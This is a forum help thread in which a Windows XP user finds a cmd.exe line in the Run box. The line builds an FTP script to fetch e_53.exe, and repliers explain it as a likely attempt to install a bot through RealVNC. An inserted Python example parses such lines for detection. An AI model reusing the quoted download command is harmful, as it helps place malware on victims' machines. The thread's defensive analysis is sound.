EugeneGardner

asked on

Have I been hacked?

When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean, please?
ASKER CERTIFIED SOLUTION
Dean Chafee
EugeneGardner

ASKER

Thanks. GRC thinks I am secure (as I am behind a firewall). My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued, as my RealVNC connection is password protected. And where would the e_53.exe file be dropped? I can't find it anywhere. Another thing I don't understand is what the point of running a script like that would be. There is no execute command!
Good that you are secure!
You probably should go back to GRC ShieldsUP and check port 5900. Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but it looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
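What the command line in the question does, step by step, as an added example that is not part of the original thread: this Python sketch replays the `echo ... > i` redirections to rebuild the FTP script and reports what `ftp -n -s:i` would then be told to do. The name `analyze` and the naive split on `&` are assumptions of this example; the sample is the string quoted in the question, including its truncated ending.

```python
import re

# The string from the question, verbatim (it is cut off after the final "&e").
SAMPLE = ("cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i "
          "&echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e")

# echo <text> > file   (overwrite)   or   echo <text> >> file   (append)
ECHO_RE = re.compile(r'^echo\s+(?P<text>.*?)\s*(?P<op>>>?)\s*(?P<file>\S+)$', re.I)
FTP_RE = re.compile(r'^ftp\b(?P<args>.*)$', re.I)

def analyze(cmdline):
    """Return a report if the line builds a file with echo and feeds it to ftp -s:, else None.

    Assumption: commands are separated by a plain '&'; quoting and '^&' escapes
    are not handled, which is enough for the string seen on this page.
    """
    body = re.sub(r'^\s*cmd(\.exe)?\s+/c\s+', '', cmdline, flags=re.I)
    files = {}      # file name -> lines that echo would have written to it
    report = None
    for part in (p.strip() for p in body.split('&')):
        m = ECHO_RE.match(part)
        if m:
            if m['op'] == '>':          # '>' truncates, '>>' appends
                files[m['file']] = []
            files.setdefault(m['file'], []).append(m['text'])
            continue
        m = FTP_RE.match(part)
        if not m:
            continue                    # e.g. "del i" or the truncated "e"
        s = re.search(r'-s:(\S+)', m['args'], re.I)
        if s and s.group(1) in files:
            script = files[s.group(1)]
            report = {
                "script_file": s.group(1),
                "script": script,
                # -n suppresses auto-login, so the script's "user" line logs in
                "no_autologin": bool(re.search(r'(^|\s)-n\b', m['args'])),
                "server": next((l.split()[1:] for l in script
                                if l.lower().startswith("open ")), None),
                "downloads": [l.split(None, 1)[1] for l in script
                              if l.lower().startswith(("get ", "recv "))],
            }
    return report

if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

The same function can be run over logged process command lines to flag any that write a file with `echo` and then pass it to `ftp -s:`.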
SOLUTION
Ahh - good point. I'm running version 4.1.1. I have just downloaded version 4.1.2.
Thanks.
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-